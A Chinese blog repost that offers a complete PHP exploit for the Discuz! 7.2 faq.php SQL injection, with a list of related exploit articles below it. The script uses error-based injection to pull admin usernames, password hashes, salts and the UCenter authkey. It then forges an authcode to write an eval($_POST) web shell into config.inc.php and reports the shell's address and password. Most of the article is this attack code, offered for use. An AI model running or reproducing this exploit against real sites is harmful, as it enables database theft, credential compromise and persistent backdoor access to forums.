Discuz! 7.2 SQL注入exp

最新推荐文章于 2024-04-13 23:50:24 发布
最新推荐文章于 2024-04-13 23:50:24 发布
阅读量195 收藏
点赞数
文章标签: php 数据库 shell

已经有人写出一些工具了,但是感觉不怎么好用,就自己写了个。

参数:
1.可直接getshell
2.爆管理账号密码
3.爆表前缀
如果表前缀不是默认的cdb_ 只需更改代码中的 $table即可,方便快捷。

下载地址:DZ7.2
附代码:

<?php
 
/**
  * @author: xiaoma
  * @blog  : www.i0day.com
  * @date  : 2014.7.2 23:1
  */
 
error_reporting (0);
set_time_limit(3000);
$host = $argv [1];
$path = $argv [2];
$js = $argv [3];
$timestamp = time()+10*3600;
$table = "cdb_" ; //表名
 
if ( $argc < 2) {
     print_r('
   ********************************************************
   *  Discuz faq.php SQL Injection Exp                    *
   *  ---------By:Www.i0day.com-----------               *
   *     Usage: php '.$argv[0].' url 1                    *
   *  -------------------------------------               *
   *  js选项: 1.GetShell 2.取密码 3.查表前缀              *
   *                                                      *
   *   php '.$argv[0].' Www.i0day.com / 1                    *
   *   php '.$argv[0].' Www.i0day.com /dz72/ 1               *
   *                                                      *
   *                                                      *
   ********************************************************
      ');
      exit ;
}
if ( $js ==1){
     $sql = "action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x3a3a,(select%20length(authkey)%20from%20" . $table . "uc_applications%20limit%200,1),0x3a3a)x%20from%20information_schema.tables%20group%20by%20x)a)%23" ;
     $resp = sendpack( $host , $path , $sql );
 
     if ( strpos ( $resp , "::" )==-1){
         echo '表前缀可能不是默认cdb_ 请先查看表前缀!' ;
     } else {
     preg_match( "/::(.*)::/" , $resp , $matches );
     $lenght = intval ( $matches [1]);
     if ( $lenght ){
         if ( $lenght <=124){
             $sql = "action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20substr(authkey,1,62)%20from%20" . $table . "uc_applications%20limit%200,1))x%20from%20information_schema.tables%20group%20by%20x)a)%23" ;
             $resp = sendpack( $host , $path , $sql );
             if ( strpos ( $resp , "1\^" )!=-1){
                 preg_match( "/1\^(.*)\'/U" , $resp , $key1 );
             $sql = "action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20substr(authkey,63,62)%20from%20" . $table . "uc_applications%20limit%200,1))x%20from%20information_schema.tables%20group%20by%20x)a)%23" ;
             $resp = sendpack( $host , $path , $sql );
             preg_match( "/1\^(.*)\'/U" , $resp , $key2 );
             $key = $key1 [1]. $key2 [1];
             $code =urlencode(_authcode( "time=$timestamp&action=updateapps" , 'ENCODE' , $key ));
             $cmd1 ='<?xml version= "1.0" encoding= "ISO-8859-1" ?>
<root>
  <item id= "UC_API" >bbs.49you.com\'); eval ( $_POST [i0day]); //</item>
</root>';
             $cmd2 ='<?xml version= "1.0" encoding= "ISO-8859-1" ?>
<root>
  <item id= "UC_API" >bbs.49you.com</item>
</root>';
             $html1 = send( $cmd1 );
             $res1 = substr ( $html1 ,-1);
             $html2 = send( $cmd2 );
             $res2 = substr ( $html1 ,-1);
             if ( $res1 == '1' && $res2 == '1' ){
             echo "shell地址:http://" . $host . $path . 'config.inc.php   pass:i0day' ;
             }
             } else {
                 echo '获取失败' ;
             }
         }
     }
    }       
 
} elseif ( $js ==2){
     $sql = "action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%280x5E5E5E,username,0x3a,password,0x3a,salt%29%20from%20" . $table . "uc_members%20limit%200,1%29,floor%28rand%280%29*2%29,0x5E%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23" ;
     $resp = sendpack( $host , $path , $sql );
     if ( strpos ( $resp , "\^\^\^" )!=-1){
         preg_match( "/\^\^\^(.*)\^/U" , $resp , $password );
         echo '密码:' . $password [1];
         } else {
             echo '表前缀可能不是默认cdb_ 请先查看表前缀!' ;
         }
} elseif ( $js ==3){
     $sql = "action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20hex(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1),0x5E)x%20from%20information_schema%20.tables%20group%20by%20x)a)%23" ;
     $resp = sendpack( $host , $path , $sql );
     if ( strpos ( $resp , "1\^" )!=-1){
         preg_match( "/1\^(.*)\^/U" , $resp , $t );
 
         if ( strpos ( $t [1], "cdb_" )!=-1){
             echo "表名为:" .hex2str( $t [1]). " 表前缀为默认cdb_ 无需修改" ;
         } else {
             echo "表名:" .hex2str( $t [1]). ' 不是默认表名cdb_请自行修改代码中的$table' ;
         }
     } else {
         echo "查看表前缀失败,Sorry" ;
     }
} else {
     echo "未选择脚本功能" ;
}
 
function sendpack( $host , $path , $sql , $js ){
        $data = "GET " . $path . "/faq.php?" . $sql . " HTTP/1.1\r\n" ;
         $data .= "Host:" . $host . "\r\n" ;
         $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0\r\n" ;
         $data .= "Connection: close\r\n\r\n" ;
         //$data.=$html."\r\n";
         $ock = fsockopen ( $host ,80);
 
         if (! $ock ){
         echo "No response from " . $host ;
         die ();
 
         }
         fwrite( $ock , $data );
 
         $resp = '' ;
 
         while (! feof ( $ock )) {
 
                 $resp .= fread ( $ock , 1024);
                 }
 
         return $resp ;
 
}
function send( $cmd ){
     global $host , $code , $path ;
     $message = "POST " . $path . "/api/uc.php?code=" . $code . "  HTTP/1.1\r\n" ;
     $message .= "Accept: */*\r\n" ;
     $message .= "Referer: " . $host . "\r\n" ;
     $message .= "Accept-Language: zh-cn\r\n" ;
     $message .= "Content-Type: application/x-www-form-urlencoded\r\n" ;
     $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n" ;
     $message .= "Host: " . $host . "\r\n" ;
     $message .= "Content-Length: " . strlen ( $cmd ). "\r\n" ;
     $message .= "Connection: Close\r\n\r\n" ;
     $message .= $cmd ;
 
     //var_dump($message);
     $fp = fsockopen ( $host , 80);
     fputs ( $fp , $message );
 
     $resp = '' ;
 
     while ( $fp && ! feof ( $fp ))
         $resp .= fread ( $fp , 1024);
 
     return $resp ;
}
 
function _authcode( $string , $operation = 'DECODE' , $key = '' , $expiry = 0) {
     $ckey_length = 4;
 
     $key = md5( $key ? $key : UC_KEY);
     $keya = md5( substr ( $key , 0, 16));
     $keyb = md5( substr ( $key , 16, 16));
     $keyc = $ckey_length ? ( $operation == 'DECODE' ? substr ( $string , 0, $ckey_length ): substr (md5(microtime()), - $ckey_length )) : '' ;
 
     $cryptkey = $keya .md5( $keya . $keyc );
     $key_length = strlen ( $cryptkey );
 
     $string = $operation == 'DECODE' ? base64_decode ( substr ( $string , $ckey_length )) : sprintf( '%010d' , $expiry ? $expiry + time() : 0). substr (md5( $string . $keyb ), 0, 16). $string ;
     $string_length = strlen ( $string );
 
     $result = '' ;
     $box = range(0, 255);
 
     $rndkey = array ();
     for ( $i = 0; $i <= 255; $i ++) {
         $rndkey [ $i ] = ord( $cryptkey [ $i % $key_length ]);
     }
 
     for ( $j = $i = 0; $i < 256; $i ++) {
         $j = ( $j + $box [ $i ] + $rndkey [ $i ]) % 256;
         $tmp = $box [ $i ];
         $box [ $i ] = $box [ $j ];
         $box [ $j ] = $tmp ;
     }
 
     for ( $a = $j = $i = 0; $i < $string_length ; $i ++) {
         $a = ( $a + 1) % 256;
         $j = ( $j + $box [ $a ]) % 256;
         $tmp = $box [ $a ];
         $box [ $a ] = $box [ $j ];
         $box [ $j ] = $tmp ;
         $result .= chr (ord( $string [ $i ]) ^ ( $box [( $box [ $a ] + $box [ $j ]) % 256]));
     }
 
     if ( $operation == 'DECODE' ) {
         if (( substr ( $result , 0, 10) == 0 || substr ( $result , 0, 10) - time() > 0) && substr ( $result , 10, 16) == substr (md5( substr ( $result , 26). $keyb ), 0, 16)) {
             return substr ( $result , 26);
         } else {
                 return '' ;
             }
     } else {
         return $keyc . str_replace ( '=' , '' , base64_encode ( $result ));
     }
 
}
function hex2str( $hex ){
     $str = '' ;
     $arr = str_split ( $hex , 2);
     foreach ( $arr as $bit ){
         $str .= chr (hexdec( $bit ));
     }
     return $str ;
     }
?>

转载文章请注明,转载自:小马's Blog http://www.i0day.com

本文链接: http://www.i0day.com/1756.html

weixin_33728268
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
discuz7.2注入漏洞faq.php
01-08
复现discuz7.2注入漏洞
Discuz!7.2 SQL注入复现实验
Tranquillity
10-23 2139
0x01 实验准备 实验原理: 实验工具: UCenter Discuz 7.2安装包 实验环境: 安装 Discuz 网站的服务器(Windows) 安装 python 环境的攻击机 0x01 实验步骤 一、搭建环境 1. 安装UCenter 通过 http://192.168.88.129/dz7.2/upload/install/index.php 页面安装: 出现错误: 将UCenter文件放置在dz7.2文件夹下,访问http://192.168.88.129/dz7.2/UCente
discuz!7.1、7.2远程代码执行漏洞exp
01-08 2193
第一种方法:先注册个用户然后把http://www.xxx.com/bbs/misc.php" enctype="multipart/form-data">帖子ID,指定一个存在的帖子即可:chr解码后是:value="${${evalfputs(fopen(forumdata/cache/usergroup,w),);里面有个提交地址改下,保存html打开点提交,
Discuz!7.2 faq.php文件SQL注入漏洞分析及利用实战
weixin_34067049的博客
07-18 1281
Discuz!7.2 faq.php文件SQL注入漏洞分析及利用实战[antian365.com] simeon   最近网上公开了Discuz!7.2版本faq.php文件SQL注入0day,通过对文件漏洞分析以及实战测试,效果不错,公开利用exp的利用需要对SQL语句以及数据库等相当了解,在某些情况下需要多种技术配合才能最终攻克目标,下面就漏洞代码以及实战利用等进行探讨,对获取管理员密码的利用...
Discuz!云平台 for Discuz!7.2 v1.0 GBK.zip
07-14
Discuz!云平台致力于帮助站长提高网站流量,增强网站运营能力,增加网站收入。... 7.2版 提供的服务包括:QQ互联、腾讯分析、纵横搜索、Discuz! 联盟、漫游应用。Discuz!云平台将陆续提供更多优质服务项目。
书签插件 for Discuz! 7.2 GBK.rar
07-14
书签插件是一款专为Discuz! 7.2 GBK版本设计的增强型功能组件,它旨在提高用户在论坛中的交互性和便利性。Discuz! 是一款广泛使用的开源社区论坛软件,GBK编码则用于支持中文字符集。这款插件的安装与使用,将为论坛...
活动召集美化插件for Discuz! 7.2 GBK.rar
07-14
Discuz! 7.2活动召集美化插件详解及应用》 Discuz! 是一款广泛应用的开源社区论坛系统,其强大的功能和易用性深受广大站长喜爱。在Discuz! 7.2版本中,为了让论坛的活动召集功能更加吸引用户、提升用户体验,...
Discuz! 7.2 安全补丁 build 20101020.zip
07-09
Discuz! 7.2 安全补丁 20101020 GBK/UTF8  补丁发布日期:20101020  更新补丁方法:  下载解压之后,请到论坛后台进行文件校验,与解压缩的upload文件夹中对应的文件进行比较,确认一下这些文件是否有做修改。...
Discuz!7.2用户手册.chm
03-20
Discuz!7.2用户手册..................
dzexp利用工具 dz7.1 dz7.2 0day漏洞利用
01-28
dzexp利用工具 dz7.1 dz7.2 0day漏洞利用
dz7.2一键getshell
07-22
dz7.2一键getshell,python脚本,亲测成功
discuz7.2sql注入漏洞
weixin_40709439的博客
09-20 8316
今天尝试了discuz7.2动力论坛的sql注入漏洞 原因是由faq.php文件源码存在漏洞引起的 下载官方discuz7.2源码,在本地搭建漏洞环境 http://www.comsenz.com/downloads/install/discuz 下载的三个文件 利用http://localhost:8088/discuz72/upload/install/index.php进行安装...
c++写的discuz<=7.2 SQL注入漏洞,批量注入工具
陈刚编程心得与知识集
08-14 930
1、得到百度搜索的结果         for (nBaiDuPage=100;nBaiDuPage         {                 //int 转换成string                 sprintf(tmpChar,"%d",nBaiDuPage);                 tmpStr=tmpChar;                 tmp
discuz 7.2 SQL 注入漏洞分析
weixin_33860722的博客
01-28 601
2019独角兽企业重金招聘Python工程师标准>>> ...
Discuz 7.2/X1 第三方插件SQL注入及持久型XSS漏洞
swordheart的博客
04-18 4756
漏洞详情 披露状态: 2010-07-31: 细节已通知厂商并且等待厂商处理中 2010-08-01: 厂商已经确认,细节仅向厂商公开 2010-08-11: 细节向核心白帽子及相关领域专家公开 2010-08-21: 细节向普通白帽子公开 2010-08-31: 细节向实习白帽子公开 2010-08-31: 细节向公众公开 简要描述: Discuz7.2/X1 第三方插件SQL注入及持久型XSS漏洞SQL注入比较鸡肋,要求GPC为off(目前这样的网站几乎绝版了) XSS因为是持久型的,只要
sql注入合集_禅道sql注入,2024年最新真香系列
最新发布
2401_83947048的博客
04-13 354
漏洞成因是impledeids将$groupids数组用,分隔开,组成了类似于’1’,‘2’,‘3’,‘4’,这样的字符返回,刚取出第一个转义符,会将正常的’转义,编程’1’,‘’,‘3’,‘4’,从而导致第三个引号和第五个引号闭合成功,3成功逃逸。先将order中的|,_置换为空格,然后取第一次出现limit的位置,取值,对orders进行了正则匹配和处理,但是没有对limit进行处理,最后又把limit拼接到了ORDERBY语句中执行,导致了注入产生。弱口令 admin admin。
discuz 7.2 faq.php sql注入漏洞,Discuz <= 7.2 /faq.php SQL注入漏洞 EXP
weixin_36081891的博客
04-07 463
具体漏洞详情我就不多说了,大家可以看freebuf的介绍,链接在下方:http://www.freebuf.com/vuls/37643.html看了网上公布的一大堆exp,发现都不是很好用,就自己写了一个获取管理员帐号密码以及uc_key的就不说了,构造语句就可以了,主要在于getshell,思路主要都是参照http://www.wooyun.org/bugs/wooyun-2014-04813...
7.2 discuzshell_Discuz! 7.2 SQL注入exp(getshell版)
weixin_39616686的博客
12-22 471
已经有人写出一些工具了,但是感觉不怎么好用,就自己写了个。参数:1.可直接getshell2.爆管理账号密码3.爆表前缀如果表前缀不是默认的cdb_ 只需更改代码中的 $table即可,方便快捷。...
discuz7.2 sql注入漏洞
06-02
Discuz! 7.2曾经存在SQL注入漏洞,这个漏洞是由于程序没有充分过滤用户输入的数据而导致的。攻击者可以通过构造特定的SQL语句来绕过程序的验证和过滤,从而获取到系统中的敏感数据。 为了避免这个漏洞,建议用户及时升级到最新版本的Discuz!,同时也应该加强系统的安全防护措施,如限制数据库用户权限、开启防火墙等。此外,还可以通过对用户输入数据进行严格的过滤和验证来避免SQL注入漏洞的发生。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值